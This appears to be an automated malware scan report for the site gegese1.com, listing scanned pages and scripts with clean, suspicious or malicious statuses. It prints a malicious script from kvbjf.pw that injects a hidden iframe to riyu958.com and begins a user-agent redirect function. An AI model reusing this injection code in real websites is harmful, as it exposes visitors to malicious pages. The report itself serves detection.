Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gegese1.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.gegese1.com/ | 200 OK Content-Length: 38625 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 6lzm2t5.gegese1.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <title>¸ç¸çÈÕ-¸ç¸çÉä-¸ç¸ç¸É</title> <meta name="keywords" content="¸ç¸çÈÕ-¸ç¸çÉä" /> <meta name="description" content="¸ç¸çÈÕ¹ÙÍøÌṩ¸ç¸ ...[4449 bytes skipped]... | ||
http://www.gegese1.com/static/js/common.js?pWt | 200 OK Content-Length: 63289 Content-Type: application/x-javascript | clean |
http://kvbjf.pw/bbs.js | 200 OK Content-Length: 1115 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.riyu958.com document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowTransparency src=http://www.riyu958.com/></iframe>");
function browserRedirect() { var sUserAgent = navigator.userAgent.toLowerCase(); var bIsIpad = sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs = sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp = sUserAgent.match(/midp/i) == "midp"; var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; ...[527 bytes skipped]... Decoded script: <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowTransparency src=http://www.riyu958.com/></iframe> Malicious iFrame found. size: 100x2450 src: http://www.riyu958.com/ This URL is marked by Google as suspicious <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowtransparency src=http://www.riyu958.com/> | ||
http://www.gegese1.com/static/js/forum.js?pWt | 200 OK Content-Length: 22720 Content-Type: application/x-javascript | clean |
http://www.gegese1.com/static/js/logging.js?pWt | 200 OK Content-Length: 603 Content-Type: application/x-javascript | clean |
http://js.users.51.la/17358146.js | 200 OK Content-Length: 1964 Content-Type: application/x-javascript | clean |
http://www.gegese1.com/home.php?mod=misc&ac=sendmail&rand=1421568873 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1 | 200 OK Content-Length: 6173 Content-Type: application/x-javascript | clean |
http://www.gegese1.com/member.php?mod=register | 200 OK Content-Length: 9724 Content-Type: text/html | clean |
http://www.gegese1.com/home.php?mod=misc&ac=sendmail&rand=1421568884 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://www.gegese1.com/./ | 200 OK Content-Length: 38625 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 6lzm2t5.gegese1.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <title>¸ç¸çÈÕ-¸ç¸çÉä-¸ç¸ç¸É</title> <meta name="keywords" content="¸ç¸çÈÕ-¸ç¸çÉä" /> <meta name="description" content="¸ç¸çÈÕ¹ÙÍøÌṩ¸ç¸ ...[4449 bytes skipped]... | ||
http://www.gegese1.com/./static/js/common.js?pWt | 200 OK Content-Length: 63289 Content-Type: application/x-javascript | clean |
http://www.gegese1.com/./static/js/forum.js?pWt | 200 OK Content-Length: 22720 Content-Type: application/x-javascript | clean |
http://www.gegese1.com/./static/js/logging.js?pWt | 200 OK Content-Length: 603 Content-Type: application/x-javascript | clean |
http://www.gegese1.com/./home.php?mod=misc&ac=sendmail&rand=1421568886 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gegese1.com
Result:
GET / HTTP/1.1
Host: gegese1.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: gegese1.com
Referer: http://www.google.com/search?q=gegese1.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gegese1.com
Referer: http://www.google.com/search?q=gegese1.com
Result:
The result is similar to the first query. There are no suspicious redirects found.